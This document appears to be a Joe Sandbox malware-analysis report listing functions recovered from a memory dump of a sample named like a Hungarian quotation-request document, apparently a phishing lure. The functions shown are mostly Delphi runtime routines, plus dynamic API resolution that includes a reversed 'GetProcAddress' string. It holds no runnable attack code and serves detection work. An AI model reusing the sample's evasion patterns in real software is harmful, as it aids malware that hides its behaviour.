                                                                                                                                                  Function 029AD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 029AD29D
                                                                                                                                                    • Part of subcall function 029AD268: GetProcAddress.KERNEL32(00000000), ref: 029AD281
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                                                  • Opcode ID: abc5ef7da9d45a2e5cd558e2921780b4f422319136d0dc43cf7177129bcc0fdc
                                                                                                                                                  • Instruction ID: 4b653e6f706dceff1b9561a58c8ba4fc0ca0924047b515ac93235648bb807df1
                                                                                                                                                  • Opcode Fuzzy Hash: abc5ef7da9d45a2e5cd558e2921780b4f422319136d0dc43cf7177129bcc0fdc
                                                                                                                                                  • Instruction Fuzzy Hash: 984147A1A893085B52186B6D7830477F7DED684B143A2561AF8088BF84DE30FD56CBF9
                                                                                                                                                  Function 029B6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 029B6EDE
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 029B6EEF
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 029B6EFF
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 029B6F0F
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 029B6F1F
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 029B6F2F
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 029B6F3F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                  • API String ID: 667068680-2233174745
                                                                                                                                                  • Opcode ID: 13ac489bc3f2b4946f09bf7ae904cd06c2ed3b08ca087b02ce95039c202959db
                                                                                                                                                  • Instruction ID: 57d61b18de70955b5042c31518ed1e9555762dd0ac97fa32a05f55087da76a7f
                                                                                                                                                  • Opcode Fuzzy Hash: 13ac489bc3f2b4946f09bf7ae904cd06c2ed3b08ca087b02ce95039c202959db
                                                                                                                                                  • Instruction Fuzzy Hash: 5EF0ACF2A8C3807DFF01BB795E998763B6DADA16043141C39A943555C2E675B4108F90
                                                                                                                                                  Function 029A2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029A28CE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message
                                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                                                  • Opcode ID: 415dccf798f71488c712eeb470f115a0659d56a7caf1abba4faa1c4fabd2b3f3
                                                                                                                                                  • Instruction ID: 6c04a4c821950daf8b5fc38fbbbdd27baf3c36b5f4d50cdf5973bece30737bd2
                                                                                                                                                  • Opcode Fuzzy Hash: 415dccf798f71488c712eeb470f115a0659d56a7caf1abba4faa1c4fabd2b3f3
                                                                                                                                                  • Instruction Fuzzy Hash: CCA10330E043648BDB21AB2CCCA0B98B7E9FB49754F1440E5ED49AB285CB759AC5CFD1
                                                                                                                                                  Function 029A252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • The unexpected small block leaks are:, xrefs: 029A2707
                                                                                                                                                  • Unexpected Memory Leak, xrefs: 029A28C0
                                                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 029A2690
                                                                                                                                                  • bytes: , xrefs: 029A275D
                                                                                                                                                  • 7, xrefs: 029A26A1
                                                                                                                                                  • , xrefs: 029A2814
                                                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 029A2849
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                  • API String ID: 0-2723507874
                                                                                                                                                  • Opcode ID: 2d918ff319598b46bafdf7e61cbdba34f01cf978890530065d821c2d74ddd4bc
                                                                                                                                                  • Instruction ID: a7db0f9578b14423e4017da2fa48454f4e06718ee3aca4d4b834f1539aa221b1
                                                                                                                                                  • Opcode Fuzzy Hash: 2d918ff319598b46bafdf7e61cbdba34f01cf978890530065d821c2d74ddd4bc
                                                                                                                                                  • Instruction Fuzzy Hash: 2D71B230E043A88FDB219B2CCC94BD9BBE9FB49754F1040E5E9499B281DB758AC5CF91
                                                                                                                                                  Function 029ABDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,029AC08B,?,?,00000000,00000000), ref: 029ABDF6
                                                                                                                                                    • Part of subcall function 029AA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                                                  • Opcode ID: 7bbd213b2b6c6fbaba6b51ff55ab00af207d67acf2cf8f390b7fc4c936d545fa
                                                                                                                                                  • Instruction ID: a1bb6503ff313fc01f084d140bf44c6dbc19d2a098a9b02769452bb506376811
                                                                                                                                                  • Opcode Fuzzy Hash: 7bbd213b2b6c6fbaba6b51ff55ab00af207d67acf2cf8f390b7fc4c936d545fa
                                                                                                                                                  • Instruction Fuzzy Hash: B2611C34B013589BDB00EBA8D871A9FB7FB9BD8700F509875A1019B645DA39D90ACFD1
                                                                                                                                                  Function 029A435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?,02A267C8,?,?,029CE7A8,029A65B1,029CD30D), ref: 029A4395
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?,02A267C8,?,?,029CE7A8,029A65B1,029CD30D), ref: 029A439B
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,029A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?,02A267C8), ref: 029A43B0
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,029A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?), ref: 029A43B6
                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029A43D4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                                                  • Opcode ID: 04ea14d2e4f9165bbda0e3d1f94789aa820fd44a78903f75b06d14730d5cbe5d
                                                                                                                                                  • Instruction ID: 54003ca8366ecb17b308408c6b31376f9dab2068c5eadb2964613584a9f77028
                                                                                                                                                  • Opcode Fuzzy Hash: 04ea14d2e4f9165bbda0e3d1f94789aa820fd44a78903f75b06d14730d5cbe5d
                                                                                                                                                  • Instruction Fuzzy Hash: 46F0B464AC934079F720B6A46D66F69775C47C8F25F200A19F366A80C1DFE480C99BA3
                                                                                                                                                  Function 029AAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029AAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 029AAD59
                                                                                                                                                    • Part of subcall function 029AAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029AAD7D
                                                                                                                                                    • Part of subcall function 029AAD3C: GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029AAD98
                                                                                                                                                    • Part of subcall function 029AAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029AAE2E
                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 029AAEFB
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 029AAF18
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029AAF1E
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,029AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029AAF33
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,029AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029AAF39
                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 029AAF5B
                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 029AAF71
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 185507032-0
                                                                                                                                                  • Opcode ID: efd958a7210536722059b276e6b500e5e2f9ce8267601b592a5601e45b4afc0f
                                                                                                                                                  • Instruction ID: 2bd65f6fb5582290110d48e3f9523b618dd277c18324a380a742e35ecf35d6cd
                                                                                                                                                  • Opcode Fuzzy Hash: efd958a7210536722059b276e6b500e5e2f9ce8267601b592a5601e45b4afc0f
                                                                                                                                                  • Instruction Fuzzy Hash: B5115AB2958300BAD700FBA8CC95F9F77FDAB85700F854925BB44D60E0DA74E904CBA2
                                                                                                                                                  Function 029AE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029AE625
                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029AE641
                                                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 029AE67A
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029AE6F7
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 029AE710
                                                                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 029AE745
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 351091851-0
                                                                                                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                  • Instruction ID: b5392193d6694debab726f41a109d7f0c0c2d10b6a97769dc9447202a552d6bb
                                                                                                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                  • Instruction Fuzzy Hash: F351ED7590172D9BCB26DF58CCA0BD9B3BDAF49300F0045E5E949E7211DA30AF858FA1
                                                                                                                                                  Function 029A3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029A35BA
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029A3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029A35ED
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,029A3610,00000000,?,00000004,00000000,029A3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029A3603
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                                                  • Opcode ID: 91fa70922864e26703a952cb622f7fc35596d488cbe2ba77b37717828c4d2c2d
                                                                                                                                                  • Instruction ID: b0537ae4a7d123008dd912ee753512c561522fdef9704059b588f3f3b63f0e8f
                                                                                                                                                  • Opcode Fuzzy Hash: 91fa70922864e26703a952cb622f7fc35596d488cbe2ba77b37717828c4d2c2d
                                                                                                                                                  • Instruction Fuzzy Hash: 7101B575944358BAEB11DF948D12BBDB7ECD748B10F1005A1BE05D6680E674A910CAD9
                                                                                                                                                  Function 029B8274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                  • API String ID: 667068680-1372893251
                                                                                                                                                  • Opcode ID: 59efb3abbbfc021c8154204960ecfd2d3de4a4235b3288534bcc64ddf4058925
                                                                                                                                                  • Instruction ID: f0a893e20bbe3edb9a3d0a7442b8abd70462d93063828875d8683db23b0e6db3
                                                                                                                                                  • Opcode Fuzzy Hash: 59efb3abbbfc021c8154204960ecfd2d3de4a4235b3288534bcc64ddf4058925
                                                                                                                                                  • Instruction Fuzzy Hash: 2E014475640304AFEB11EFA8DD61E9EB7EEFBCDB00F514460E800D7640DA70AA05CE64
                                                                                                                                                  Function 029AAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,029AAAE7,?,?,00000000), ref: 029AAA68
                                                                                                                                                    • Part of subcall function 029AA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,029AAAE7,?,?,00000000), ref: 029AAA98
                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 029AAAA3
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,029AAAE7,?,?,00000000), ref: 029AAAC1
                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 029AAACC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4102113445-0
                                                                                                                                                  • Opcode ID: 6489c091d83cd9dedab710e3390d036860a617e3c6494d4703ea49acfa83e08c
                                                                                                                                                  • Instruction ID: fcd563a897f3f83be385074dcb7917368dab1b0cb60e41b13a6c4d17dbd2417b
                                                                                                                                                  • Opcode Fuzzy Hash: 6489c091d83cd9dedab710e3390d036860a617e3c6494d4703ea49acfa83e08c
                                                                                                                                                  • Instruction Fuzzy Hash: 2D01A2B56003446FFB12AEA8CD31B6F77BEDBC5B10F514560E402A6AC0D6659E00CAE5
                                                                                                                                                  Function 029AAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,029AACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 029AAB2F
                                                                                                                                                    • Part of subcall function 029AA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread
